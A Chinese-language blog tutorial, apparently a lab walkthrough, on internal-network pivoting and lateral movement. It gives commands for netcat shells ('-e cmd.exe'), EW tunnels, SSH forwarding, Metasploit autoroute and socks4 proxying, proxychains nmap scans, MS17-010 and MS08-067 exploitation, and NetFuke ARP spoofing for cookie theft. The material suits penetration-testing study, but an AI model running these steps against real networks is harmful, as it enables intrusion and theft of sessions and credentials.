1200字范文,内容丰富有趣,写作的好帮手!
1200字范文 > 内网渗透-内网代理穿透和内网横向移动

内网渗透-内网代理穿透和内网横向移动

时间:2020-11-07 19:51:44

相关推荐

内网渗透-内网代理穿透和内网横向移动

内网代理穿透和内网横向移动

文章目录

内网代理穿透和内网横向移动前言内网代理穿透nctermite(ew)ssh正向代理(A,B,C)msf设置路由和sock4代理访问内网流量内网横向移动后记

前言

进入内网后,我们就要扫描内网中有哪些主机了,重点是我们外网是无法访问内网的主机的,所在网段是不一样的,这时就需要我们设置代理和路由进行访问内网的流量了。上一期讲解了信息收集的相关内容,收集网段,补丁和域中成员以及域控的信息,对以下的横向移动至关重要,对后期的提权做好了准备。

内网代理穿透

首先,我们介绍几种代理工具的使用

nc

nc是一个强大的端口转发工具

nc

建立通信

nc.exe -l -p 123(kali)

nc.exe 192.168.219.4 123(主机)

扫描端口 nc -vz -w 2 192.168.0.200 8001-8009

nc.exe -vz -w 2 192.168.219.4 8001-8009

传文件

nc.exe 192.168.231.128 123 < netcat-0.7.1.zip(本机,输出机)

nc -l -p 123 > netcat-0.7.1.zip(kali,输入机)

也可以进行反向连接

nc.exe 192.168.231.128 123 > 123.txt

nc -l -p 123 < 1.txt

nc反弹shell

靶机

nc.exe -l -p 123 -t -e cmd.exe

主机

nc.exe 192. 168 231.128 123(回弹了shell)

在公网监听

nc 192.168.231.128 5555(kali的地址和ip)

nc -lp 5555(kali本地监听5555端口)

termite(ew)

termite是一款强大的内网穿透工具,但由于被黑客利用,导致危险性太大,就停止使用,大家可以下载ew内网穿透工具进行测试,也是同样的效果。

/Termite

(1)linux

上传后,chmod 777 agent_linux_i586

./agent_linux_i586 -l 123

监听

在win10主机上

agent_Win32.exe -c 192.168.231.128 -p 123

(2)window

在win10主机上

agent_Win32.exe -c 192.168.231.128 -p 123

在内网主机上

agent_Win32.exe -l 123

获得跳板机后,shell 123

在本机上

nc 127.0.0.1 123

ssh正向代理(A,B,C)

用于A不能访问C的问题,C是内网机器

三台机器kali,win7,win03

kali要访问到win03的网站,就需要用B进行转发

ssh -L 8001(A的端口):192.168.10.138:8001© root@192.168.8.143(B,win7)

意思是将C中的8001端口转发到kali的8001端口上,需要输入B的密码才可以转发成功

在kali中输入127.0.0.1:8001即可访问C中8001端口的服务了

ssh反向代理

ssh -R 192.168.10.138:8001:127.0.0.1:80 root@192.168.8.143

Linux查看端口

netstat -tnlp

msf设置路由和sock4代理访问内网流量

由于我的靶机中没有相应的漏洞利用,所以扫描到内网的主机也无法进行利用,所以,就借用师傅的打靶过程给大家演示一遍了,在以后打靶的时候也好有个思路可以利用。

(三级网络)

msf代理模块(在会话中执行)

(V1)

当我们那到内网的一台主机了(192.168.231.128),存在两个网段,也就是10.0的网段,就需要进行设置路由和sock4代理进行访问内网的流量了

(V2)

设置路由

run autoroute -s 192.168.10.0./24

扫网段

run post/windows/gather/arp_scanner RHOSTS=192.168.10.0./24

backgroup

端口扫描模块

search portscan

use 5

set rhosts 192.168.10.0/24

setg threads 50

options

run

找sock4代理模块

search socks4

use 0

sessions -l(找会话)

options

set srvhost 127.0.0.1(写本地的地址),1080

options

netstat -tnlp(查看端口是否占用,没有占用,直接run)

run

vi /etc/proxychains.conf

修改

sock4 127.0.0.1 1080

采用代理扫描

proxychains nmap -sT -sV -Pn -n -p22,80,135,139,445 --script=smb-vuln-ms* 192.168.10.137(ms*,扫所有smb的漏洞)

(必须添加参数,因为只可以正向传过去,不可以反向传过来)

扫描存在漏洞,搜索漏洞进行攻击

search ms17-010

use 3

options

set rhosts 192.168.10.137

run

执行不成功(因为默认的是反向连接,是不能反向连接的,只能正向连接)

set payload windows/x64/meterpreter/bind_tcp(我连他)

options

run

利用成功了

(V3)

设置路由

run autoroute -s 192.168.20.0./24

扫网段

run post/windows/gather/arp_scanner RHOSTS=192.168.20.0./24

search socks4

use 0

sessions -l(找会话)

options

set srvhost 127.0.0.1(写本地的地址),1081

options

netstat -tnlp(查看端口是否占用,没有占用,直接run)

run

vi /etc/proxychains.conf

在添加一个

sock4 127.0.0.1 1081

proxychains nmap -sT -sV -Pn -n -p22,80,135,139,445 --script=smb-vuln-ms* 192.168.20.128(内网的第二级网络)

search ms08-067

use 0

options

set rhosts 192.168.20.128

set payload windows/meterpreter/bind_tcp

options

show targets

set target 34

run

返回会话了

shell

exit

backgrounp

sessions -l

一共返回了三个会话,实验成功

内网横向移动

横向渗透的方法:

1.了解网络(信息收集)

分析网络中有哪些主机(pc,server /linux/winodows/打印机)

分析服务,分析端口

扫描器分析服务

服务攻击有哪些方法

1.爆破

2.漏洞 smb

3.欺骗

4.钓鱼

流量监听工具

wireshare(只能抓未加密的包文,可以访问内网的流量)

cain

这里cain跟wireshare是一样的,我的由于版本太老,总是抓不到用户的登录信息,这里就不给大家做演示了

wiresharke 抓取内网流量

过滤地址

http && ip.src192.168.231.134(原地址发出的)

http && ip.dst192.168.231.134(发送到的目的地址)

Arp欺骗

NetFuke(实验)

Evil foca

ettercap

这里给大家讲一个ARP欺骗的NetFuke工具,可以结合钓鱼来使用,强制使用户跳转到另外的网站,进行获取cookie信息等等,不过,这个工具也只能win03可以使用,我在03机器上给大家演示一下吧。

这里他不管访问什么网站,都进行了欺骗,都是出现同一个页面,不过前提必须是http协议,https是进行了加密的,欺骗不了。

我们打开win03的NetFuke进行配置信息,进行欺骗。

点击嗅探配置

按我的打上对钩即可,不要选择ICMP选项,选择主动转发,在点击ARP欺骗

添加对应的嘻嘻和欺骗方式

点击http_inject后,进入后可以修改欺骗的内容

我们点击左上角的箭头,进行欺骗即可

我们看一下效果,当我们访问的时候,返回了hello!!,说明欺骗成功了。我们在访问淘宝也是如此,借此我们利用钓鱼进行诱导用户进入另一个页面,进行获取cookie。也可以反弹shell提权等。

后记

内网代理穿透就不给大家演示了,因为工具已经大部分已经不能用了,所以就给大家演示了一个横向的Arp欺骗的工具了,横向移动和三级网络,其实就是设置路由和sock4代理进行监听和扫描内网的流量,这样才能为后面的提取和权限维持做铺垫,知识点比较多,下次给大家总结一下权限维持的知识吧。

本内容不代表本网观点和政治立场,如有侵犯你的权益请联系我们处理。
网友评论
网友评论仅供其表达个人看法,并不表明网站立场。